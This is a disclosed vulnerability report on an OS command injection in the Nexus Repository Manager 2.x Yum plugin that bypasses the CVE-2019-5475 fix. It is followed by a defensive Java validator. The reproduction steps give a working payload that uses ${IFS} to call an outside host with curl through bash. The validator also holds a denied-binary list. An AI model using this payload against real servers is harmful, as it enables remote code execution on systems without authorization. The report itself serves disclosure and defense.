OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475)

Disclosed: 2019-10-29 11:03:48 By badcode_ To central-security-project
Critical
Vulnerability Details
## OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)

# Maven artifact

**groupId:** org.sonatype.nexus.plugins
**artifactId:** nexus-yum-repository-plugin
**version:** 2.14.14-01

# Vulnerability

## Vulnerability Description

The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. Every code path that passes user-supplied data through CommandLineExecutor.java is vulnerable, such as the Yum Configuration Capability.

## Additional Details

Take a look at the patch for CVE-2019-5475: https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84

![](1.png)

The `getCleanCommand` method does not filter the command completely and can still be bypassed.

## Steps To Reproduce:

1. Navigate to "Capabilities" in Nexus Repository Manager.
2. Edit or create a new Yum: Configuration capability.
3. Set the path of "createrepo" or "mergerepo" to an OS command (e.g. `/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo`).

![](2.png)

## Supporting Material/References:

- Ubuntu
- Sonatype Nexus Repository Manager 2.14.14-01
- Java 8

# Wrap up

- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N

## Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.
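The root cause described above is that a configured "path" is cleaned by a filter and then handed to a shell, so any gap in the filter (here, `${IFS}` standing in for a space) becomes command execution. The defensive pattern is the opposite: treat the setting as a path, not a command, reject anything outside a strict path alphabet, require that it resolve to an existing executable regular file, refuse shell and interpreter binaries, and launch it through `ProcessBuilder` with an argument list so nothing is ever re-parsed by a shell. The class below is an added illustration of that pattern, not code from the Nexus plugin or from the report; `StrictCommandRunner`, `validateExecutable`, `run` and the denied-basename list are assumptions chosen for this example, and the sample inputs in `main` are constructed (the report's own payload string is reused as one of them to show it being rejected).

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added example (hypothetical, not the plugin's CommandLineExecutor):
 * validate an operator-supplied executable path, then run it without a shell.
 */
public final class StrictCommandRunner {

    // A conservative absolute-path alphabet: no whitespace, no shell
    // metacharacters, and no '$' so expansions such as ${IFS} cannot appear.
    private static final Pattern SAFE_ABSOLUTE_PATH =
        Pattern.compile("^/[A-Za-z0-9._/-]+$");

    // Binaries that would turn a "path" setting into an interpreter for
    // arbitrary input; assumed list for this example.
    private static final List<String> DENIED_BASENAMES =
        Arrays.asList("sh", "bash", "dash", "zsh", "ksh", "perl", "python", "python3");

    /** Returns the validated path or throws if the configured value is unacceptable. */
    static Path validateExecutable(String configured) {
        if (configured == null || !SAFE_ABSOLUTE_PATH.matcher(configured).matches()) {
            throw new IllegalArgumentException(
                "path is not absolute or contains disallowed characters");
        }
        Path p = Paths.get(configured).normalize();
        // Reject '..' components, '//' and trailing slashes: the normalized
        // form must be exactly what the operator typed.
        if (!p.toString().equals(configured)) {
            throw new IllegalArgumentException("path is not in canonical form");
        }
        if (!Files.isRegularFile(p) || !Files.isExecutable(p)) {
            throw new IllegalArgumentException(
                "path does not point to an existing executable regular file");
        }
        String base = p.getFileName().toString();
        if (DENIED_BASENAMES.contains(base)) {
            throw new IllegalArgumentException(
                "shell and interpreter binaries are not accepted as createrepo/mergerepo");
        }
        return p;
    }

    /** Runs the validated executable with fixed arguments; no shell is involved. */
    static int run(String configuredPath, List<String> args)
            throws IOException, InterruptedException {
        Path exe = validateExecutable(configuredPath);
        List<String> cmd = new ArrayList<>();
        cmd.add(exe.toString());
        cmd.addAll(args); // each argument is its own argv entry, never re-parsed
        Process proc = new ProcessBuilder(cmd).redirectErrorStream(true).start();
        return proc.waitFor();
    }

    public static void main(String[] argv) {
        // Constructed sample settings: a plausible tool path, the report's
        // payload shape, and a bare shell binary.
        String[] samples = {
            "/usr/bin/createrepo",
            "/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo",
            "/bin/bash",
        };
        for (String s : samples) {
            try {
                validateExecutable(s);
                System.out.println("accepted: " + s);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The second sample fails at the regex (space, `$`, `{`, `|` and `:` are all outside the alphabet), and the third fails at the basename check even though it is a valid executable; the first is accepted only on a host where `/usr/bin/createrepo` actually exists and is executable, which is the point of checking the filesystem rather than trusting the string.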
Report Stats
  • Report ID: 688270
  • State: Closed
  • Substate: resolved
  • Upvotes: 34